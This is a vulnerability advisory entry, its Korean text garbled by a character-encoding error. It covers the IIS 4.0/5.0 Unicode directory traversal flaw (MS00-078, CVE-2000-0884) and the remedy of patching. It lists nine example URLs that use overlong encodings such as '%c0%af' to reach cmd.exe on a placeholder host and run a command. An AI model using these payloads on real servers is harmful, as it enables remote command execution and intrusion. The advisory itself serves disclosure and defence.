| Ãë¾àÁ¡ID |
22103 |
| À§Çèµµ |
40 |
| Æ÷Æ® |
80, ¡¦ |
| ÇÁ·ÎÅäÄÝ |
TCP |
| ºÐ·ù |
WWW |
| »ó¼¼¼³¸í |
IIS ¼¹ö(4.0/5.0)¿¡ Á¸ÀçÇÏ´Â Ãë¾àÁ¡À¸·Î À¥ºê¶ó¿ìÁîÀÇ URL¿¡¼ '%c0%af'¿Í °°Àº unicode Ç¥±â¸¦ ÀÌ¿ëÇÏ¿© ¿ÜºÎ¿¡¼ ¼¹ö³»ÀÇ ÀÓÀÇÀÇ ¸í·ÉÀ» ¼öÇàÇÒ ¼ö ÀÖ´Ù. OS°¡ ÀÖ´Â µå¶óÀ̺꿡 IIS¼¹ö°¡ ¼³Ä¡µÇ¾î ÀÖÀ» ¶§ Ãë¾àÁ¡Àº ¾Æ·¡¿Í °°Àº ¹æ¹ýÀ¸·Î ã¾ÆÁú ¼ö ÀÖ´Ù. ¸¸¾à ´Ù¸¥ µå¶óÀ̺꿡 ¼³Ä¡µÇ¾î ÀÖ´Ù¸é ¹®Á¦´Â ¿©ÀüÈ÷ Á¸ÀçÇÏÁö¸¸ ÀÏ´Ü ¾Æ·¡¿Í °°Àº ¹æ¹ýÀ¸·ÎÀÇ Å©·¡Å·Àº ÇÒ ¼ö ¾ø´Ù.
Http://target.server/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
* Âü°í »çÀÌÆ®:
http://technet.microsoft.com/en-us/security/bulletin/ms00-078 |
| ÇØ°áÃ¥ |
Microsoft»çÀÇ security bulletin¿¡ ÀÖ´Â MS00-078¸¦ ÂüÁ¶ÇÏ¿© IIS ¼¹ö¸¦ PatchÇÏ¿©¾ß ÇÑ´Ù.
http://support.microsoft.com/kb/269862/en-us |
| °ü·Ã URL |
CVE-2000-0884 (CVE) |
| °ü·Ã URL |
(SecurityFocus) |
| °ü·Ã URL |
(ISS) |
|
